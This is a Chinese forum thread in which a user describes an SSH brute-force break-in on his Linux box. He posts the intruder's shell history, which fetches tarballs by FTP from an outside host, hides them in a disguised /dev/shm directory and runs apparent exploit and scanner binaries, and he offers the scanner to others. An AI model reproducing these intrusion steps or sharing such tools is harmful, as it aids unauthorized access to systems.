免费注册 查看新帖 |

Chinaunix

平台 论坛 博客 文库
最近访问板块 发新帖

今天,被一个外国菜鸟黑了。 [复制链接]

论坛徽章:
1 [收藏(0)] [报告]
太巧合了,
今天,我在图书馆自修,自己的机器在寝室里开着。
回来结果,一看吓了一大跳。
按照我的习惯lastlog,
一看,一个兄弟从AC83C13D.ipt.aol.com
ssh到我的主机。那小子运气太好了,我正好在路由器中
大开了ssh NAT 到我的主机(我在图书馆有点东东要在我的机器上跑),
我的用户名和密码都是一样的jeremiah:jeremiah
这小子估计写了个程序(字典暴力破解),进入了我的系统。
由于发现的及时,那小子还在做事,文件没有损失,历史记录还没有
被修改。下面是他的小动作。
310  touch
  311  uname
  312  w
  313  hostname
  314  passwd
  315  ls
  316  cd /dev/shm
  317  ls
  318  mkdir ". /"
  319  cd ". /"
  320  ftp redclubtm.netfirms.com
  321  ls
  322  tar zxvf 0.tgz
  323  tar zxvf copi.tgz
  324  tar zxvf hosts.tgz
  325  tar zxvf ker.tgz
  326  tar zxvf newd.tgz
  327  tar xvf newd.tgz
  328  ls
  329  rm -rf 0.tgz copi.tgz hosts.tgz ker.tgz newd.tgz
  330  ls
  331  chmod +x *
  332  export PATH=.PATH
  333  ker
  334  0
  335  rm -rf 0 ker
  336  cd hosts
  337  ls
  338  rm -rf nobash.txt vuln.txt
  339  chmod +x *
  340  export PATH=.PATH

May 12 22:34:59 redhat passwd: pam_unix(passwd:chauthtok): password changed for jeremiah
May 12 22:48:37 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah
May 12 22:49:14 redhat passwd: pam_unix(passwd:chauthtok): authentication failure; logname= uid=500 euid=0 tty=pts/2 ruser= rhost=  user=jeremiah

从这
318  mkdir ". /"
  319  cd ". /"
来看,这兄弟老玩了,不过本地提升为root,
在我的机器上,是不可能的事.

那些文件保密,只是binary,是一个扫描开22端口的主机的程序,有需要的联系我。

论坛徽章:
2 [报告]
哥们给我一份我研究研究
laosi923#163.com

论坛徽章:
3 [报告]
有点 高深 ,我 对哪些高深的 命令不怎么懂 能不能后面给 注释下是什么意思 我初学,先谢谢了~